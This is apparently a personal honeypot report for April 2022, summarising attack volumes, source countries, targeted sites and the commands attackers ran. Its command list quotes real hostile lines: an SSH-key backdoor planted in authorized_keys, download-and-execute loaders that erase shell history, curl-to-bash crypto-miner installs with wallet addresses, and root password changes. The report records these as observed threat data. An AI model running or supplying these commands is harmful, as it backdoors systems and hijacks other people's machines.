April 2022

I experienced a few issues with the Honey pot over February and March therefore I did not have enough data to write a report, Now the honey pot is back up and running we continue to be attacked. We still see America being the top country to launch attacks, This is thanks to Cloudflare’s IP addresses showing up as US IPs

The daily attacks did spike to 60,000 requests and the lowest was 1,900 requests, We see a similar pattern back in January when the attacks ramped up at the end of the month.

The username/login combination has not changed throughout the honeypot being run and it’s roughly the same number of logins to root/admin compared to the previous months

Ya.ru has taken the lion’s share (18.18%) of attacks towards its URL via port 80. We continue to see a number of attacks on port 80 across different addresses. We also continue to see Zenolabs.com being the second-highest attack. This was the same in January.

With commands being run, we are still seeing a number of requests for Cryptominers being installed. We continue to see uname -a being the top command. This was the same in most of the previous reports,

CMD: uname -a3069
CMD: uname -m2793
CMD: w2774
CMD: cat /proc/cpuinfo | grep name | head -n 1 | awk ‘{print $4,$5,$6,$7,$8,$9;}’2773
CMD: ls -lh $(which ls)2773
CMD: which ls2772
CMD: free -m | grep Mem | awk ‘{print $2 ,$3, $4, $5, $6, $7}’2769
CMD: crontab -l2768
CMD: uname2768
CMD: top2767
CMD: cat /proc/cpuinfo | grep model | grep name | wc -l2766
CMD: lscpu | grep Model2764
CMD: cat /proc/cpuinfo | grep name | wc -l2508
CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo “ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr”>>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~2470
CMD: uname -s -v -n -r -m326
CMD: cd /tmp ; wget | curl -O ; chmod 777 ok.sh ; ./ok.sh ; rm -rf ok.sh ; history -c210
CMD: cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget; curl -O; chmod 777 onion002; sh onion002; tftp -c get onion002.sh; chmod 777 onion002.sh; sh onion002.sh; tftp -r .sh -g; chmod 777 onion002; sh onion002; ftpget -v -u anonymous -p anonymous -P 21 .sh .sh; sh .sh; rm -rf sh bins.sh .sh .sh; rm -rf *165
CMD: curl -s -L https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh | bash -s 4ANkemPGmjeLPgLfyYupu2B8Hed2dy8i6XYF7ehqRsSfbvZM2Pz7bDeaZXVQAs533a7MUnhB6pUREVDj2LgWj1AQSGo2HRj; wget https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh; sh setup_c3pool_miner.sh 4ANkemPGmjeLPgLfyYupu2B8Hed2dy8i6XYF7ehqRsSfbvZM2Pz7bDeaZXVQAs533a7MUnhB6pUREVDj2LgWj1AQSGo2HRj; echo -e “xox0\nxox0” | passwd149
CMD: curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA; lspci | grep -i –color ‘vga\|3d\|2d’; echo root:ggds264e3123g4tij24jti1u3ji23rg|chpasswd|bash146
CMD: wget && chmod +x * && ./systemd -o de.minexmr.com:443 -B -u 8BHQUunQHax1XjPonUxPKk1H4EKP6SdXnMtyyY5W9Bts7qM7uq5XsjjXiPj1zacMGP8chCv4cumYZRYfH5cUBGshKy1gssW -k –tls –rig-id Main

Hopefully, the issues with my honeypot are resolved and I have no further issues so I can continue reporting my findings.